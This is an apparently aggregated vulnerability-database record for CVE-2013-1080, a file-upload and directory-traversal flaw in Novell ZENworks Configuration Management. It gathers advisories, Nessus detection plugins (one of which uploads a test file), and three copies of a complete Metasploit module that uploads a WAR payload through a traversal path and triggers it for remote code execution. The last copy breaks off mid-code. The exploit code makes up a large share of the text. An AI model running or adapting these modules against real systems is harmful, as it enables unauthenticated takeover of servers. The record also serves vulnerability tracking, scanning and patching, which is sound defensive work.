isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "naslFamily": "CGI abuses", "pluginID": "66914", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:13:01", "bulletinFamily": "NVD", "description": "The web server in Novell ZENworks Configuration Management (ZCM) 10.3 and 11.2 before 11.2.4 does not properly perform authentication for zenworks/jsp/index.jsp, which allows remote attackers to conduct directory traversal attacks, and consequently upload and execute arbitrary programs, via a request to TCP port 443.", "modified": "2013-12-13T05:12:00", "id": "CVE-2013-1080", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1080", "published": "2013-03-29T16:09:00", "title": "CVE-2013-1080", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. \n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "id": "SAINT:94F8E6CAEFFA04E9B0850B791E66098C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "title": "Novell ZENworks Control Center file upload vulnerability", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. \n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "id": "SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "type": "saint", "title": "Novell ZENworks Control Center file upload vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "description": "Added: 05/03/2013 \nCVE: [CVE-2013-1080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080>) \nBID: [58668](<http://www.securityfocus.com/bid/58668>) \nOSVDB: [91627](<http://www.osvdb.org/91627>) \n\n\n### Background\n\n[Novell ZENworks Configuration Management](<http://www.novell.com/products/zenworks/configurationmanagement/>) is an IT desktop computer management suite that provides the ability to install, configure and administer desktop computers from a centralized location. The product is based on a client/server architecture. \n\n### Problem\n\nThe ZENworks Configuration Management Control Center does not sufficiently enforce authentication for file uploads, and is also affected by a directory traversal vulnerability. A remote attacker could execute arbitrary commands by exploiting these two vulnerabilities together. \n\n### Resolution\n\nApply the appropriate patch referenced in [Novell Knowledge Base document 7011812](<http://www.novell.com/support/kb/doc.php?id=7011812>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-049/> \n\n\n### Limitations\n\nExploit works on Novell ZENworks Configuration Management 11 SP2 on Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). Exploit also works on Novell ZENworks Configuration Management Appliance 11 SP2 on SUSE Linux Enterprise Server 11 (x86_64) SP1. \n\nExploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/zenworks_control_center_upload", "id": "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "type": "saint", "title": "Novell ZENworks Control Center file upload vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:32", "bulletinFamily": "exploit", "description": "", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/121042/Novell-ZENworks-Configuration-Management-Remote-Execution.html", "id": "PACKETSTORM:121042", "type": "packetstorm", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell ZENworks Configuration Management Remote Execution', \n'Description' => %q{ \nThis module exploits a code execution flaw in Novell ZENworks Configuration \nManagement 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control \nCenter application, allowing an unauthenticated attacker to upload a malicious file \noutside of the TEMP directory and then make a second request that allows for \narbitrary code execution. This module has been tested successfully on Novell \nZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE \nLinux Enterprise Server 10 SP3. \n}, \n'Author' => \n[ \n'James Burton', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-1080' ], \n[ 'BID', '58668' ], \n[ 'OSVDB', '91627' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ], \n[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ] \n], \n'Privileged' => false, \n'Platform' => [ 'win', 'linux' ], \n'Targets' => \n[ \n[ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'Traversal' => '../webapps/' \n} \n], \n[ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/' \n} \n] \n], \n'DefaultTarget' => 1, \n'DisclosureDate' => 'Mar 22 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]) \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\" \n}) \n \nif res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/ \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \ndef exploit \n \n# Generate the WAR containing the EXE containing the payload \napp_base = rand_text_alphanumeric(4+rand(4)) \njsp_name = rand_text_alphanumeric(8+rand(8)) \n \nwar_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s \n \nprint_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\") \n \n# Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars \nboundary = \"----#{rand_text_alpha(34)}\" \ndata = \"--#{boundary}\\r\\n\" \ndata << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\" \ndata << \"Content-Type: application/octet-stream\\r\\n\\r\\n\" \ndata << war_data \ndata << \"\\r\\n\" \ndata << \"--#{boundary}--\" \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\", \n'ctype' => \"multipart/form-data; boundary=#{boundary}\", \n'data' => data \n}) \n \nif res and res.code == 302 \nprint_status(\"Upload finished, waiting 20 seconds for payload deployment...\") \nelse \nfail_with(Exploit::Failure::Unknown, \"Failed to upload payload\") \nend \n \n# Wait to ensure the uploaded war is deployed \nselect(nil, nil, nil, 20) \n \nprint_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"), \n'method' => 'GET', \n}) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121042/zenworks_control_center_upload.rb.txt"}], "d2": [{"lastseen": "2019-05-29T19:19:05", "bulletinFamily": "exploit", "description": "**Name**| d2sec_zcm2 \n---|--- \n**CVE**| CVE-2013-1080 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Novell ZENWorks Configuration Management Arbitrary File Upload Remote Code Execution Vulnerability \n**Notes**| \n", "modified": "2013-03-29T16:09:00", "published": "2013-03-29T16:09:00", "id": "D2SEC_ZCM2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_zcm2", "title": "DSquare Exploit Pack: D2SEC_ZCM2", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2016-11-09T00:18:15", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENworks. Authentication is not required to exploit this vulnerability. \n\nThe specific issues exists within ZENworks Control Center which listens on tcp/443 by default. Insufficient authentication checking on /zenworks/jsp/index.jsp allows a remote attacker to upload files to the webserver. By combining this with a directory traversal vulnerability, an attacker can exploit this condition to gain remote code execution as SYSTEM.", "modified": "2013-11-09T00:00:00", "published": "2013-03-22T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-049", "id": "ZDI-13-049", "title": "Novell ZENworks Control Center File Upload Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T03:00:24", "bulletinFamily": "scanner", "description": "The installed version of Novell ZENworks Control Center has a flaw\nwith authentication checking on ", "modified": "2019-11-02T00:00:00", "id": "NOVELL_ZCC_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/65722", "published": "2013-03-28T00:00:00", "title": "Novell ZENworks Control Center File Upload Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65722);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution\");\n script_summary(english:\"Checks for interim fix\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw\nwith authentication checking on '/zenworks/jsp/index.jsp' that can\nallow a remote, unauthenticated attacker to upload arbitrary files and\nexecute them with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"novell_zenworks_detect.nasl\");\n script_require_keys(\"SMB/Novell/ZENworks/Installed\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"bsal.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"zip.inc\");\ninclude(\"obj.inc\");\n\nget_kb_item_or_exit(\"SMB/Novell/ZENworks/Installed\");\n\n# Get details of the ZCM install.\npath = get_kb_item_or_exit(\"SMB/Novell/ZENworks/Path\");\nver = get_kb_item_or_exit(\"SMB/Novell/ZENworks/Version\");\n\nvuln = FALSE;\n\n# 10.3.x is vuln\n# 11.2.x is vuln\nif (ver =~ \"^10\\.3($|\\.)\" ||\n ver =~ \"^11\\.2\\.[01]($|\\.)\")\n vuln = TRUE;\n\nif (ver =~ \"^11\\.2\\.3($|\\.)\")\n{\n # fixed in 11.2.3a MU 1\n if(ver_compare(ver:ver, fix:\"11.2.3.24691\", strict:FALSE) == -1)\n vuln = TRUE;\n}\n\n# check if interim fix has been applied\nif (ver =~ \"^11\\.2\\.2($|\\.)\")\n{\n jar_file_raw_path = path;\n if (path[strlen(path)-1] != '\\\\') jar_file_raw_path += '\\\\';\n jar_file_raw_path += \"share\\tomcat\\webapps\\zenworks\\WEB-INF\\lib\\njwc.jar\";\n jar_file = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\",\n string:jar_file_raw_path);\n\n share = hotfix_path2share(path: path);\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:jar_file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n if (isnull(fh))\n {\n NetUseDel();\n exit(1, \"Unable to open '\" + jar_file_raw_path + \"'.\");\n }\n\n res = zip_parse(smb:fh);\n\n # cleanup\n CloseFile(handle:fh);\n NetUseDel();\n\n if (isnull(res))\n exit(1, \"Error while trying to extract '\" + jar_file_raw_path + \"'.\");\n\n if (isnull(res[\"files\"][\"com/novell/web/util/ValidateDateUtil.class\"][\"timestamp\"]))\n exit(1, \"Jar file missing information for 'com/novell/web/util/ValidateDateUtil.class'.\");\n\n timestamp = res[\"files\"][\"com/novell/web/util/ValidateDateUtil.class\"][\"timestamp\"];\n # msdos format yyyy-mm-dd hh:mm:ss - we are only interested in date portion\n item = eregmatch(pattern: \"^(\\d{4})-(\\d{2})-(\\d{2}) \", string:timestamp);\n if (isnull(item))\n exit(1, \"Error parsing timestamp on 'com/novell/web/util/ValidateDateUtil.class'.\");\n\n year = int(item[1]);\n month = int(item[2]);\n day = int(item[3]);\n\n # patch modified date: 3/5/2013\n # check to see if patch has been applied\n if (\n year < 2013 ||\n (year == 2013 && month < 3) ||\n (year == 2013 && month == 3 && day < 5)\n ) vuln = TRUE;\n}\n\nif (ver =~ \"^11\\.2\\.3($|\\.)\")\n fix = \"11.2.3a Monthly Update 1\";\nelse\n fix = \"11.2.2 with interim fix\";\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:kb_smb_transport(), extra:report);\n }\n else security_hole(kb_smb_transport());\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Novell ZENworks\", ver, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-05T05:35:45", "bulletinFamily": "exploit", "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.\n", "modified": "2017-09-08T01:18:50", "published": "2013-03-30T18:35:04", "id": "MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD", "href": "", "type": "metasploit", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\n 'Description' => %q{\n This module exploits a code execution flaw in Novell ZENworks Configuration\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control\n Center application, allowing an unauthenticated attacker to upload a malicious file\n outside of the TEMP directory and then make a second request that allows for\n arbitrary code execution. This module has been tested successfully on Novell\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\n Linux Enterprise Server 10 SP3.\n },\n 'Author' =>\n [\n 'James Burton', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-1080' ],\n [ 'BID', '58668' ],\n [ 'OSVDB', '91627' ],\n [ 'ZDI', '13-049' ],\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\n ],\n 'Privileged' => false,\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'Traversal' => '../webapps/'\n }\n ],\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => 'Mar 22 2013'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\n })\n\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n\n # Generate the WAR containing the EXE containing the payload\n app_base = rand_text_alphanumeric(4+rand(4))\n jsp_name = rand_text_alphanumeric(8+rand(8))\n\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\n\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\n\n # Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars\n boundary = \"----#{rand_text_alpha(34)}\"\n data = \"--#{boundary}\\r\\n\"\n data << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\n data << war_data\n data << \"\\r\\n\"\n data << \"--#{boundary}--\"\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => data\n })\n\n if res and res.code == 302\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\n else\n fail_with(Failure::Unknown, \"Failed to upload payload\")\n end\n\n # Wait to ensure the uploaded war is deployed\n select(nil, nil, nil, 20)\n\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\n send_request_cgi({\n 'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"),\n 'method' => 'GET',\n })\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/zenworks_control_center_upload.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "File upload vulnerability in Novell ZENworks Configuration Management\n\nVulnerability Type: File Upload", "modified": "2013-04-02T00:00:00", "published": "2013-04-30T00:00:00", "id": "E-318", "href": "", "type": "dsquare", "title": "Novell ZENworks Configuration Management 11 SP2 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-09T01:46:11", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This Metasploit module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "id": "1337DAY-ID-20599", "href": "https://0day.today/exploit/description/20599", "type": "zdt", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a code execution flaw in Novell ZENworks Configuration\r\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control\r\n Center application, allowing an unauthenticated attacker to upload a malicious file\r\n outside of the TEMP directory and then make a second request that allows for\r\n arbitrary code execution. This module has been tested successfully on Novell\r\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\r\n Linux Enterprise Server 10 SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'James Burton', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1080' ],\r\n [ 'BID', '58668' ],\r\n [ 'OSVDB', '91627' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ],\r\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'win', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Traversal' => '../webapps/'\r\n }\r\n ],\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => 'Mar 22 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the EXE containing the payload\r\n app_base = 